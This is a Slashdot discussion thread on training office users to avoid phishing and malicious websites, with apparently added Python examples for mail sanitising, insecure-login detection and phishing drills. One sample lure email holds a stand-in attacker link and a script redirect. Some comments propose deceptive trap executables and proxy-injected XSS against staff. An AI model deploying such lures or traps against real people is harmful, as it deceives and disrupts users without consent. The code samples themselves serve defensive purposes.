Impressing Security Upon End-Users Visually? 157

Posted by Soulskill
from the shake-your-fist-and-glare dept.
get quad writes "I continually have to remind our end-users to be vigilant about the usual web security hazards, such as not clicking links in the occasional spam email that passes through our filters, avoiding suspicious websites, why some websites aren't entirely safe or appropriate for the work environment (Facebook apps, MySpace, remote access apps, proxies, etc), and the myriad other things an end-user can do to get into trouble. What I'm hoping to find are video or flash examples (mind you, in layman's terms) of what Web-based exploits/zero-day threats are capable of, how they can happen, and the harm they can ultimately cause — rather than posting links to technical docs the users will never bother to read. Getting the point across in a purely visual and less technical manner seems much more effective. Does anyone have any suggestions or experience with this type of training?"
  • Explosions! (Score:4, Funny)

    by sopssa (1498795) * <sopssa@email.com> on Saturday October 24, 2009 @11:25AM (#29856859) Journal

    Make a video where the user clicks "Run File" in Internet Explorer and then the building explodes.

    • Even easier with better impact, just give a simple security message that any wrong action on their part can open a security hole - then flash the g'tse [wikipedia.org] image.
      Your users will not dare to violate your security rules after that, and probably not ever again for the rest of their lives.
      • by snowraver1 (1052510) on Saturday October 24, 2009 @11:51AM (#29857081)
        Just show them this:

        http://www.youtube.com/watch?v=1SNxaJlicEU
          • by fyngyrz (762201) *

            ...remove the links, scripts and images from the emails before they get to the end user. If your users really can't be trusted with certain things, then why are you giving them the very things they can't be trusted with?

            No sensible person or company puts those things in an email any more, anyway. If you need to go do something with your account at your bank, the email just says, "Please go to your account and check your status." Anything further is probably spam, mal-something, or straight-up clueless.
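The suggestion above, stripping links, scripts and images from mail before it reaches the end user, is what a mail-gateway filter does. The following is an added example written for this page (not code from the thread, and not any product's filter): it rewrites every text/html part of a message so that anchors lose their href but keep their visible text, images become a "[image: alt]" placeholder, script/style/iframe blocks disappear together with their content, and on* handlers and style attributes are dropped from whatever remains. The sample message, its addresses and the evil.example domain are constructed for the demonstration.

```python
"""Mail-gateway style filter: strip links, scripts and images from an HTML e-mail.

Added example for the idea above; not code from the thread or from any product.
Standard library only.  The sample message at the bottom is constructed.
"""
import html
from email import message_from_string, policy
from html.parser import HTMLParser

# Elements dropped together with everything inside them.
ACTIVE_BLOCKS = {"script", "style", "iframe", "object", "embed", "noscript"}
# Void elements dropped outright (tracking pixels, remote stylesheets, <base href>).
DROP_TAGS = {"img", "link", "meta", "base"}


class LinkStripper(HTMLParser):
    """Rewrites HTML so the reader has nothing to click and nothing executes.

    <a href=...> keeps its visible text but loses the href; <img> becomes
    '[image: alt text]'; script/style/iframe blocks vanish with their content;
    on* event handlers and style attributes are removed from everything else.
    Comments and <!DOCTYPE> are dropped by the default (no-op) handlers.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0          # nesting depth inside a dropped block
        self.stats = {"links": 0, "images": 0, "active_blocks": 0}

    def handle_starttag(self, tag, attrs):
        if self._skip:
            if tag in ACTIVE_BLOCKS:
                self._skip += 1
            return
        if tag in ACTIVE_BLOCKS:
            self._skip = 1
            self.stats["active_blocks"] += 1
        elif tag == "img":
            self.stats["images"] += 1
            alt = dict(attrs).get("alt")
            if alt:
                self.out.append(f"[image: {html.escape(alt)}]")
        elif tag in DROP_TAGS:
            pass
        elif tag == "a":
            self.stats["links"] += 1      # the anchor text survives via handle_data
        else:
            safe = [(k, v) for k, v in attrs
                    if not k.lower().startswith("on") and k.lower() != "style"]
            attr_text = "".join(f' {k}="{html.escape(v or "")}"' for k, v in safe)
            self.out.append(f"<{tag}{attr_text}>")

    def handle_startendtag(self, tag, attrs):
        # <br/> style tags: emit the start tag only; a self-closed script/iframe
        # still needs its matching end so the skip counter returns to zero.
        self.handle_starttag(tag, attrs)
        if tag in ACTIVE_BLOCKS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self._skip:
            if tag in ACTIVE_BLOCKS:
                self._skip -= 1
            return
        if tag in ACTIVE_BLOCKS or tag in DROP_TAGS or tag == "a":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))


def sanitize_html(src: str):
    """Return (clean_html, stats) for one HTML body."""
    p = LinkStripper()
    p.feed(src)
    p.close()
    return "".join(p.out), p.stats


def sanitize_message(raw: str) -> str:
    """Rewrite every text/html part of an RFC 822 message and return it as text."""
    msg = message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            clean, _ = sanitize_html(part.get_content())
            part.set_content(clean, subtype="html")   # replaces payload and Content-* headers
    return msg.as_string()


# Constructed sample: a lure with a link, a tracking pixel and an inline script.
SAMPLE_MAIL = """\
From: "Your Bank" <alerts@bank.example>
To: user@corp.example
Subject: Please confirm your account
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear customer, <a href="http://evil.example/login" onclick="steal()">verify your account</a> today.</p>
<img src="http://evil.example/track.gif" alt="">
<script>window.location = "http://evil.example/drive-by";</script>
</body></html>
"""

if __name__ == "__main__":
    print(sanitize_message(SAMPLE_MAIL))
```

The filter deliberately keeps the anchor text ("verify your account") so the user still sees what the sender wanted, but has nothing to click; a gateway that wants to keep links would instead rewrite the href to an internal click-checking service, which is a different design. Multipart messages are handled because walk() visits every part, and the plain-text alternative is left untouched.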

      • Even easier with better impact, just give a simple security message that any wrong action on their part can open a security hole

        Didn't Microsoft already try UAC and fail miserably...

    • Re: (Score:3, Funny)

      by xgadflyx (828530) *
      Actually, we've found that "making an example" has been the most effective security measure. Call a meeting - "Tom here has decided to do $INSERT_ENDUSER_STUPIDITY, so we're going to take this time to show you what happens.." Then you just grab a hammer and smash fingers. Some people puke, others just turn away in disgust; regardless, we haven't had a user click a phishing email in over 2 years.
    • Re: (Score:2, Funny)

      by Anonymous Coward

      There's a freeware program that, when run, starts flashing the screen, and plays at MAX volume "HEY EVERYONE, I'm looking at GAY porno!" ... just send that around, and people will quickly learn not to open programs.

    • Re: (Score:3, Insightful)

      by pentalive (449155)
      That may have the same sort of effect as "Reefer Madness": the audience ignores the message due to the "over the top"-ness of the presentation.
    • Re: (Score:3, Insightful)

      by Runaway1956 (1322357) *

      Hmmm. I read the posted question/summary. Started scrolling down, reading comments. Stopped. Go back up and read just the title. Hmmm. Forget everything else, just concentrate on the title.

      Could you make some kind of a monitoring app, which displays a graphic?

      I don't mean to make a new antivirus. Just some graphic attached to existing antivirus and anti-malware software. It monitors the stupid things people do, and displays a ribbon or something across the top of the toolbar. Put a red end on the

    • Re: (Score:3, Interesting)

      by DiegoBravo (324012)

      > such as not clicking links in the occasional spam email which passes through filters, avoiding suspicious websites,

      Just set up a daily cron job to send an email with a link pointing to a page on your web server that shows:

      YOU CLICKED THE BAD LINK. YOU'RE AN IDIOT. NEXT TIME WE'LL CUT YOUR SALARY.

      For the email subject, just collect a handful of common spam phrases, like "Tired of seeing disappointed faces on women when they pull down your pants". Problem solved.

  • Why can't users choose their own level of security? Idiots be damned. But I bet you find a whole bunch of people wise up really fast. :P
    • by 1s44c (552956) on Saturday October 24, 2009 @11:39AM (#29856977)

      Why can't users choose their own level of security? Idiots be damned. But I bet you find a whole bunch of people wise up really fast. :P

      You could try it but I doubt it will make your life easier. Most users don't understand and don't care and will expect you to fix their mistakes over and over again. Most of them have some kind of twisted pride in their ignorance.

      There was research done on office staff by flashing up random warning messages on their screens, most users ignored the messages no matter what they said, clicked anything to get rid of the message, and immediately forgot there was even a message.

      • I agree - it's like herding cattle. I was hoping to open an avenue of thought concerning educating the user more... even if in an extreme example. Good thoughts, friend. VERY interesting research cited... can you point us to the details? Thanks!
    • by jimicus (737525)

      Because when their computer is completely hosed and borderline unusable as a direct result, the chances are the OP or someone in a similar role will have to pick up the pieces. This gets really old really fast.

      Myself, I think there may be something to be said for the endpoint security products that combine centrally managed antivirus, firewall and antispyware features.

    • I, for one, get paid to keep them and my employers from wasting valuable time, money, and bandwidth on such errors.

    • by DrNASA (849379)
      HAHAHA - spoken like the guy not responsible for cleaning up other people's messes and securing mission-critical or personal data. Users choosing their own level of security is why (probably) more than 70% of GeekSquad work is wiping hard drives due to malware. In the real world of business, it is the sysadmin's job to provide the resources to get the job done and keep data safe. That's it. Getting the job done does not include YouTube, Facebook, or Solitaire (yes, there are cases where social media is requ
      • by shiftless (410350)

        Work is called that for a reason. Hopefully you are fortunate enough to enjoy the work that you do, making it seem less like work, but work it is and shall be and sucks to the whiners.

        This is one of those "facts" that was drilled into your brain as a child, then as a teenager, and as an adult. You just blindly accepted it without question as "the way things are", and now these are the "facts" you tell everyone you meet. Most people will grudgingly accept it as true, unsure as to why deep down inside they f

    • by pentalive (449155)
      Perhaps because the asset at risk is company data, and some of the users could not care less about company data. Some of those users might even be middle management. Upper management usually knows the value of the data but they have other follies.

      Joe User: Passwords do vex me - lets kill them now!

      IS Dept: But that will mean anyone could copy our data.

      Joe User: So? I could get my job done.

      IS Dept: Even our most hated competitors would know everything.

      Joe User: So? I could get my job done.

      IS Dept: ???

    • The whole bloody mess is mis-engineered... The secure settings in IE are a bear to browse with, and are still vulnerable to some zero day exploits. Windows itself is a mess, how many areas are there to check for programs that load at boot?

      the legacy dos files...
      the run and run-once lines in the registry (all of them)
      runservices
      load
      userinit
      the startup menu
      the startup menu for the user
      lots of the code doesn't work unless it gets full rein to jack your system. Turn on the Windows-based security an
  • by John Hasler (414242) on Saturday October 24, 2009 @11:38AM (#29856963) Homepage

    ...about computer security? Those work so well.

    • by gmuslera (3436)
      Probably a better example would be looking for a "Taken" about computer security... At least the start of the movie, no matter how much we would like to hit, shoot, stab, and put a spammer/botnet herder under electric shocks until the light gets cut for non-payment.
    • Yes, they do, on a mass scale. When applied "properly" to things like smut, terrorism, gay marriage, etc, the "Reefer Madness" tactic works very well. In fact it's still working on the drug situation also. Otherwise prohibition would have been abolished a long time ago. Do not underestimate the power of "madness".

    • How about "Napster Baaaaad"?

  • I was spending some time with some friends of mine a few months back when the inevitable malware conversation came up. These friends happened to all be quite computer illiterate. What I did instead of giving the usual spiel about malware was show them a better experience.

    I sat them down and showed them how to use Firefox with NoScript. I showed them their favorite sites without all the baggage and they were amazed at the improved experience. I made sure I showed them how to use NoScript with sites like Facebook and still get what they wanted.

    All of this was done in less than 15 minutes, and they now use this combination on a daily basis, not because of the improved security, but because of the improved experience. The fact that their security is improved is entirely incidental.

    Note to Firefox devs: improve your enterprise management tools so that I can justify rolling out Firefox to the enterprise after proving to management that it can be managed at the enterprise level. Enterprises need ways to consistently enforce policies with Firefox using AD! Until this can be done Firefox will never take over from Internet Explorer in the Enterprise.

    • Re: (Score:3, Insightful)

      by ddillman (267710)
      Note to Firefox devs: improve your enterprise management tools so that I can justify rolling out Firefox to the enterprise after proving to management that it can be managed at the enterprise level. Enterprises need ways to consistently enforce policies with Firefox using AD! Until this can be done Firefox will never take over from Internet Explorer in the Enterprise.

      You know, sticking this down in some random response on a Slashdot discussion thread is not the most likely way to have Firefox devs see and pos

    • Send out a fake spam email. Anyone who clicks on the link gets a security warning letter and a "You are subject to termination for clicking on the link in an email. Contact HR immediately"

  • by Cyko_01 (1092499) on Saturday October 24, 2009 @11:39AM (#29856985) Homepage
    here is a great video that shows how to detect a phishing scam using examples http://www.youtube.com/watch?v=bzfPUmQcfDs [youtube.com]
  • Backdoor.Ghostnet (Score:3, Informative)

    by adnd74 (1022357) on Saturday October 24, 2009 @11:41AM (#29857013)
    Symantec Security Response [sarc.com] has an excellent video about Backdoor.Ghostnet [youtube.com] on their youtube channel [youtube.com].

    I think the message here is that if you don't practice safe computing, the tools exist that empower just about anyone to pwn you
  • You know what would be really cool? If you had a rewriting-proxy that would occasionally insert a cartoon spy in pages that could be unsafe, reminding/warning them about what could have happened. For example if they submitted a form with a password, and it wasn't encrypted, the spy could pop up and say "This password is unprotected, and could be snooped. Be sure not to use the same password for anything important!", and then have buttons the users could click to submit the form anyway or cancel. If they arr
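The check behind the "cartoon spy" proposal above is: a password field is about to be submitted without encryption. The following is an added example written for this page, not code from the thread and not any proxy's actual implementation. It resolves each form's action against the page URL and reports password forms whose action is plain HTTP. It also reports a password form that was itself delivered over plain HTTP even when the action is https, since a page fetched in the clear can be rewritten in transit and its action changed; that second rule is this example's own addition. The sample pages and the intranet.example hostnames are constructed.

```python
"""Find login forms that a rewriting proxy should warn about.

Added example, not code from the thread.  Standard library only; the sample
page and hostnames are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormCollector(HTMLParser):
    """Collects every <form> with its resolved action and whether it contains
    a password field.  Nested forms are not valid HTML, so tracking one open
    form at a time is enough."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "form":
            # A missing or empty action means "submit to the current URL".
            self._open = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "has_password": False}
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "text").lower() == "password":
                self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._open is not None:
            self.forms.append(self._open)
            self._open = None

    def close(self):
        super().close()
        if self._open is not None:          # unterminated form at end of page
            self.forms.append(self._open)
            self._open = None


def unprotected_password_forms(page_url: str, page_html: str):
    """Return [(resolved_action, [reasons])] for each password form at risk."""
    parser = FormCollector(page_url)
    parser.feed(page_html)
    parser.close()
    page_https = urlparse(page_url).scheme == "https"
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        reasons = []
        if urlparse(form["action"]).scheme != "https":
            reasons.append("password is submitted over plain HTTP")
        if not page_https:
            reasons.append("form was delivered over plain HTTP and may have been altered")
        if reasons:
            findings.append((form["action"], reasons))
    return findings


# Constructed sample: an intranet login page served without TLS.
SAMPLE_PAGE = """
<form action="/login" method="post">
  <input name="user"><input type="password" name="pass"><input type="submit">
</form>
<form action="https://search.intranet.example/q"><input name="q"></form>
"""

if __name__ == "__main__":
    for action, why in unprotected_password_forms("http://intranet.example/", SAMPLE_PAGE):
        print(action, "->", "; ".join(why))
```

A proxy would run this over each HTML response it relays and decide what to inject; whatever it injects is, as the reply below notes, something a malicious page can imitate, so the finding is more useful as a log entry for the admin than as a pop-up for the user.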

    • A reminder/warning that user should click on to make it go away?

      How much time do you suppose would pass before:

      a) users completely ignore it, madly clicking [ OK ] without even looking at the text?
      b) it is spoofed and/or copied by malware sites, cartoon spy and all?

      Answer should be calculated in minutes and seconds, but feel free to use larger time units like hours and days.

  • by Unequivocal (155957) on Saturday October 24, 2009 @12:02PM (#29857157)

    http://www.scientificamerican.com/article.cfm?id=how-to-foil-phishing-scams [scientificamerican.com]

    This is a good start and I'd recommend investigating the author's other published material.

    • by JSG (82708)

      Hilarious: The original poster asks for advice and you post a "pay to read" link.

      I have nothing against a journalist trying to make a living but you were asked for your advice not someone else's (are you the author - can't be arsed to check.)

      This is a discussion about phishing, do you see what I am getting at?

      • I see there's some irony there. It's not phishing. The guy is looking for resources; I point him towards an article with a solid bibliography. If he doesn't want to pay, that's his (or anyone else's) business. He can go to the library and look it up if he wants it for free, just like any other book or mag. Just b/c it's not free and on the internet doesn't mean it's not useful.

        I do agree that I should have pointed out that this is a for-fee site.

  • Check out Cisco's website. Really. Most of the time, they have some videos geared towards marketing and business types. They even have some cute superhero thing about threats. It drives me crazy because usually I go there for technical purposes, I want to see configuration commands and tech docs. But every once in a while I'll find a good diagram or video which gets my point across to non-techie types.
  • it doesn't matter how you explain it to them, whether it's pretty pictures or text, they won't understand or care.
  • http://cisr.nps.edu/cyberciege/ [nps.edu] is a video game designed to teach computer security concepts. In addition to its more advanced scenarios, it includes a few simple "awareness" scenarios, the first of which directly addresses your topic. Further, this animated movie: http://cisr.nps.edu/cyberciege/movies/02CIEGE.html [nps.edu] helps the layman understand why the problem of malicious software is so hard to solve. The link includes a free evaluation version of the game.

  • Videos help? (Score:4, Insightful)

    by MrCrassic (994046) <deprecated@emaELIOT.il minus poet> on Saturday October 24, 2009 @12:08PM (#29857209) Journal

    I figured that most people would treat videos on computer security like the videos that teachers would show at school. Their reaction?

    "NO WORK!!!"

    I think that what's most effective is just enforcing your security policies using Group Policy or other management tools on the network. That way, you KNOW that most people won't violate any policies set forth, and those that do are the ones that didn't need the training in the first place.

    If you're really adamant about educating your employees with videos and such, find REALLY GOOD videos that will hold their attention for their entire run. Remember, at the end of the day, those computers don't belong to them and most of them simply wish to get work done. Any teaching method which can exploit these two truths for educational value is probably worth watching.

  • Dark Ages (Score:2, Insightful)

    by banished (911141)
    My company's solution is to lock down the systems so tightly as to turn network systems into standalone systems.
  • by petes_PoV (912422) on Saturday October 24, 2009 @12:20PM (#29857277)
    Viruses, worms etc. aren't really the users' problem - unless you can categorically point the finger at an individual and get them fired (as an example to the others). Why should they care if THE COMPANY computers crash, or slow down, or give them reasons why they can't do their job?

    So why should they go to the inconvenience of not clicking on links that they want to, or not visiting any website that takes their fancy? By appealing to their "professionalism" or "humanity" or "team spirit" you're probably on a loser. While these might get them geed up for a short time, you can bet that unless there's some personal pain involved in doing it, they'll be back to their old habits in a few weeks' time.

    Once you can put security in terms a normal user will understand: i.e. If you click on a bad website, these bad things will happen TO YOU, they'll pay attention. Until then you haven't got a chance.

    • by Abstrackt (609015)

      Excellent point about bringing personal pain.

      When I found some malware (Securitytool, basically holds the computer hostage) on one of the computers I called everyone around it and told them that because someone installed something they weren't supposed to, everyone who used that computer for online banking or any other important activities needed to change their passwords if they wanted to keep their bank accounts full. To this day I don't know who kept messing up that computer but it hasn't happened since.

  • by OpenSourced (323149) on Saturday October 24, 2009 @12:23PM (#29857297) Journal

    Nobody learns to avoid fire by being told. You have to get near and feel the heat to know you'd better not do it. So my advice is: make traps. Send them emails signed by another coworker asking for their password. Send them executable files that block their computer and flash a sign telling them that all their files are being erased, just because they executed a file from an unknown origin. All kinds of traps, with nasty consequences if possible; you don't want them to click on everything because it could be another amusing idea of yours. You want them scared of your ideas so that they look askance at every email or web page to see if it could be a trap. As they might be, so that's the right attitude.

  • It is pretty simple really. You have to set policy and communicate it. Then, if policy is broken the company must actually follow up with the repercussions stated in the policy. People are pretty smart - they understand repercussions. If the company doesn't back up the policy then it's not a policy, and there's no real reason for users to follow it.
  • Make yourself a laptop with a Deep Freeze image. This way you can infect the system at will, reboot, and it's clean.

    Show the people using your system just how badly a zero-day exploit can hose a system.

    Reboot, show the next group. Rinse, repeat.

  • http://www.virtualforge.de/vmovie.php [virtualforge.de]

    the XSS and CSRF videos are very good visualizations for the common user using simple examples.

  • by JustNiz (692889) on Saturday October 24, 2009 @12:57PM (#29857583)

    Deny internet access to repeat offenders. They soon get the message that way.

  • Excellent question but, unfortunately, it hit the main /. page on a Saturday. Let's just say that the percentage of readers who are IT professionals drops off significantly over the weekend. Go figure.

    Most of your responses so far are along the lines of, "You NAZI! Leave your users alone and let the ones who don't learn get what they deserve." Obviously, not the response of an IT type who has to deal with regulatory requirements and wants to keep his job. You might try the same question again but on a

  • by mrsquid0 (1335303) on Saturday October 24, 2009 @01:03PM (#29857623) Homepage

    Hi, I'm Troy McClure. You may remember me from such IT security videos as "Microsoft Explorer: Ubiquitous but Unsecure" or "Passwords: The Road to Ruin".

  • A demonstration of the "Customer Appreciation Bat" works wonders.

    Although since it's a corporate institution, the "Security Empowerment Bat" might be more effective.

  • I suggest you emphasize the possibilities of what the Chinese government hackers, Russian mafia, and US Customs & Border Patrol will do to them if they don't practice proper security procedures. A scene from "Deliverance" [youtube.com] that will get the point across. You know what I'm talking about.
  • by BLKMGK (34057) <morejunk4me@@@hotmail...com> on Saturday October 24, 2009 @01:47PM (#29857975) Homepage Journal

    Sunbelt Security had a video posted of what occurs when you get hit by the old WMF bug a while back. You could see software being installed, icons appearing on the desktop, and the desktop background being modified as this thing went to town and began popping fake AV warnings. It was one of THE most extreme and informative examples I can think of for this.

    Here's a copy of it I found on Youtube. A search for "WMF exploit" on YouTube will get you plenty of hits :-)

    http://www.youtube.com/watch?v=WTBcDJ9kJH4 [youtube.com]

    IMO, I think this answers your question!

  • why not block access to anything non-approved?
    More accurately, only allow specific sites.
    Yes, some people will get around it, but most people capable enough to get around it aren't high risk. How many people who know how to tunnel would also download smileys?

  • Maybe create some internal XSS that resides on your corporate proxy server. So when someone runs (say) a Facebook app, your XSS runs some Javascript off of an internal server that does something moderately annoying like continual pop-ups. Then if they click on one of the popups, disable their external web access completely.

  • why some websites aren't entirely safe or appropriate for the work environment (Facebook apps, MySpace, remote access apps, proxies, etc),

    Okay, I'll bite. Do facebook and myspace fall in the unsafe category, or are they just inappropriate? Obviously you don't want employees spending all their time at their desks screwing around with facebook, because you want them to be doing useful work. But if there's some actual security vulnerability that is opened up when a user simply goes to a web page with a certa

  • A normal brown-box Fedex-like package. When they open it, a balloon bursts and glitter goes everywhere.

    Maybe they'll learn not to open random packages when it means maybe cleaning glitter for six days.

  • People respond to their actual incentives, not what you pretend the incentives are.

    If people were held personally liable for damages caused by security breaches that they enabled, they would get smarter about security.

    I'm not arguing that they should be held liable, just that it's going to be hard to make them care when they aren't.
  • Send some "test" links yourself. When you manage to break into the user's machine, e-mail the user his own confidential document, password, etc. Then tell him _how_ he exposed himself and that you _could_ have been the bad guy.

    I learned how to use chmod properly this way a LONG time ago -- the teaching method was highly effective... :)

    (You will, of course, get the careless users ticked off -- so make sure you have management approval for this. But seeing _proof_ of what _will_ happen will get the message
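Several comments in this thread converge on the same exercise: a cron job mailing a spam-looking link that lands on a "you clicked" page, a fake spam run where clickers get a warning letter, deliberate traps, and the "test links" just above. The following is an added example written for this page (not code from the thread, and not any commercial phishing-simulation product) of the piece those ideas all need: a per-recipient link that identifies who clicked without being guessable, a lure message, the landing-page logic and a summary report. The recipient addresses, the campaign secret, the sender address, the X-Phish-Drill header and LANDING_URL are all made up; sending the mail through a real MTA and serving the landing page from an internal web server are left to the reader.

```python
"""Phishing drill: unique per-recipient links, click recording, report.

Added example, not code from the thread.  Every address, secret and URL here
is constructed.  Only the standard library is used.
"""
import hashlib
import hmac
import secrets
from datetime import datetime, timezone
from email.message import EmailMessage
from urllib.parse import parse_qs, urlparse

LANDING_URL = "https://training.intranet.example/clicked"   # hypothetical

WARNING_PAGE = """<h1>This was an internal phishing drill.</h1>
<p>The link you just followed could have installed malware or stolen your
password.  Nothing happened this time.  Report suspicious mail to the helpdesk
instead of clicking.</p>"""


def make_token(secret: bytes, campaign_id: str, user: str) -> str:
    """HMAC-derived token: one user cannot compute another user's link and
    'click' on their behalf, and the token reveals nothing about its owner."""
    mac = hmac.new(secret, f"{campaign_id}|{user}".encode(), hashlib.sha256)
    return mac.hexdigest()[:32]


class Campaign:
    def __init__(self, campaign_id: str, users, secret=None):
        self.id = campaign_id
        self.secret = secret or secrets.token_bytes(32)
        self.users = list(users)
        self._token_to_user = {make_token(self.secret, self.id, u): u for u in self.users}
        self.clicks = {}        # user -> UTC time of first click

    def link_for(self, user: str) -> str:
        return f"{LANDING_URL}?t={make_token(self.secret, self.id, user)}"

    def lure_email(self, user: str, subject: str,
                   sender: str = "it-helpdesk@intranet.example") -> EmailMessage:
        """Plain-text lure.  X-Phish-Drill is a hypothetical marker so the mail
        gateway's own link filter can let the drill through."""
        msg = EmailMessage()
        msg["From"] = sender
        msg["To"] = user
        msg["Subject"] = subject
        msg["X-Phish-Drill"] = self.id
        msg.set_content(f"Please review the notice at {self.link_for(user)} "
                        "before the end of the day.")
        return msg

    def landing(self, request_url: str, when=None):
        """What the landing page does with a request: returns (status, body, user).

        Unknown tokens get a 404 so scanners or curious users probing the URL
        learn nothing; only the first click per user is recorded."""
        token = (parse_qs(urlparse(request_url).query).get("t") or [""])[0]
        user = self._token_to_user.get(token)
        if user is None:
            return 404, "", None
        self.clicks.setdefault(user, when or datetime.now(timezone.utc))
        return 200, WARNING_PAGE, user

    def report(self) -> dict:
        clicked = sorted(self.clicks)
        rate = round(len(clicked) / len(self.users), 3) if self.users else 0.0
        return {"campaign": self.id, "sent": len(self.users),
                "clicked": clicked, "click_rate": rate}


if __name__ == "__main__":
    # Constructed run: two recipients, one of whom clicks.
    drill = Campaign("2009-q4", ["alice@intranet.example", "bob@intranet.example"])
    for who in drill.users:
        print(drill.lure_email(who, "Mailbox quota exceeded").as_string())
    drill.landing(drill.link_for("alice@intranet.example"))
    print(drill.report())
```

Two design points matter in practice. The token is an HMAC over the user name rather than the user name itself, so nobody can forward a colleague's link or forge one, and the landing page answers 404 to anything it does not recognise. And the report counts people, not clicks: a drill is about who needs more training, and the comments above about management approval apply in full before any of this is pointed at real staff.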

  • 1. "If someone can do something wrong, someone will."
    There's no way to circumvent this. Ever. Period. You have to accept that humans make errors. But it's ok if they learn from it.
    The problem is:

    2. "To get people to learn from something, they have to have an interest in it."
    So if it does not hurt them, and does not give them an advantage, then why should they learn anything? Humans are all about efficiency. In fact, all competing life-forms ever are. In all of the universe.
    So what do you do? You follow basic rules of creating a motivating gradient. By offering advantages for those who learn, and disadvantages for those who don't.

    Here, remember that positive gradients (relative to the person's state) are always better than negative ones (like punishment).

    So I recommend this: At the next salary raise, raise them a bit less. But offer the remaining part as a bonus for those who can prove their security awareness.
    The amount is pretty easy to choose: It's the amount that you'd lose (e.g. the money to recover from loss or destruction), multiplied by the likelihood (e.g. one in a million = 0.000001), divided by the number of people in the company (optional, depending on your p.o.v.).

    You could check their security-awareness, by testing them every year on a random day. Like a fire drill. But with a security drill. (Without announcing anything. Without any alarm going off.)
    And by filling out a question form at the end of the day (one that takes a negligible amount of time, and is also there, to refresh the knowledge. One more reason to make it a random day [= better learning])

    You can bet your mother on the fact that they will be much better at caring for security! ^^

    Only remember to make all those drills, bonuses and tests proportional to the actual real amount of damage. Don't be surprised if it then turns out to be less than you thought.

  • A while back a slashdot comment had a link to security cartoon [securitycartoon.com]. The cartoons are cute and pretty thorough, though they may be a bit simple and are somewhat outdated. It's visual and pretty straightforward.

  • Usually, when something "bad" happens, you get to see the result. You lose your wallet, you can't pay next time you have to. Someone breaks into your house, everything's turned upside down. With malware, there just ain't anything to see.

    To make things worse, people have been told by Hollywood that there is something to see. Computer screens "melting" or outright explosions (those dreaded 220kV lines in those flatscreens ... you know...), or at least some nifty CGI (honestly, every time someone searches fing
